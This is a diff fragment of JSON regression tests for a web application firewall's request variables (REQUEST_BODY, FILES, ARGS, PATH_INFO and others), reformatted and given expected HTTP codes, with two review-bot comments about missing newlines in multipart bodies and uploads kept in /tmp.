] }, - "expected":{ - "error_log":"o0,1v226,1" + "expected": { + "error_log": "o0,1v226,1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES_NAMES \"t\" \"id:1,phase:2,pass,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REMOTE_USER", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"27", - "Content-Type":"application/x-www-form-urlencoded", + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REMOTE_USER", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "27", + "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpPcGVuU2VzYW1l" }, - "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", - "method":"GET" + "uri": "/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,7v198,30t:trim" + "expected": { + "error_log": "o0,7v198,30t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_USER \"Aladdin\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1002,38 +1328,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1051,38 +1386,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY_LENGTH", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY_LENGTH", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1100,38 +1444,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v193,516t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY_LENGTH \"@gt 5\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/file?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/file?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
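Review bot: The `body` array of the "REQUEST_FILENAME 1" case at the end of this hunk still lists its multipart lines without a trailing `\n` (`"----------------------------756b6d74fa1a8ee2",`), unlike the REQUEST_BODY_LENGTH case just above it. Since patch 01 stops the harness from appending a newline per element, this body presumably reaches the multipart parser as one unbroken line while `SecRequestBodyAccess On` and the multipart Content-Type are in effect, so the case now feeds a malformed body without saying so. The expected `o6,5v5,11t:trim` appears to depend only on the URI, so the test likely still passes; if the malformed body is intended, state it in the `title` (JSON has no comments), otherwise end each element with `\n` as the neighbouring cases do, e.g. `"Content-Disposition: form-data; name=\"name\"\n",`. The same applies to the "REQUEST_FILENAME 2", "REQUEST_FILENAME 3" and "PATH_INFO" cases in the hunks at -1149, -1198 and -1786. The body array continues outside this hunk.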
@@ -1149,38 +1502,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,5v5,11t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,5v5,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/file\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -1198,38 +1560,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 3", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 3", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -1247,38 +1618,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1296,38 +1676,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,4v306,4t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,4v306,4t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: ARGS/Multipart 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: ARGS/Multipart 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1349,38 +1738,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,5v402,5t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,5v402,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS \"test2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1402,38 +1800,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,16v680,20t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,16v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file2\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1455,38 +1862,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,16v512,20t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,16v512,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES \"small_text_file1\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_NAMES", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_NAMES", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1508,38 +1924,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,8o0,8v491,8t:trimo0,16o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_NAMES \"(fiasdfasdfledata|filedata)\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1561,38 +1986,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v560,32t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:filedata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_SIZES 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_SIZES 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1614,38 +2048,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v754,38t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_SIZES:fiasdfasdfledata \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_COMBINED_SIZE", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_COMBINED_SIZE", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -1667,38 +2110,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"v560,32v754,38t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "v560,32v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule FILES_COMBINED_SIZE \"@gt 0\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1720,10 +2172,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o8,7v754,38t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o8,7v754,38t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
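Review bot: The `rules` of the "FILES_TMP_CONTENT 1" case in the second hunk on this line (`@@ -1720,10 +2172,19 @@`) keep `SecUploadKeepFiles On` together with `SecUploadDir /tmp`, so each run presumably leaves the uploaded parts behind in a shared, world-writable directory. Whether the harness cleans them up is not visible here; a directory private to the test run would avoid name collisions and stale files between runs, e.g. `"SecUploadDir <per-run-temp-dir>",` (placeholder). The same two directives recur in the FILES_TMP_CONTENT 2, PATH_INFO, MULTIPART_FILENAME and MULTIPART_NAME cases in the following hunks, and the rules array continues outside this hunk.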
@@ -1731,29 +2192,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - FILES_TMP_CONTENT 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1775,10 +2236,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o15,5v560,32t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o15,5v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
@@ -1786,29 +2256,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1830,10 +2300,19 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,4v5,23t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,4v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
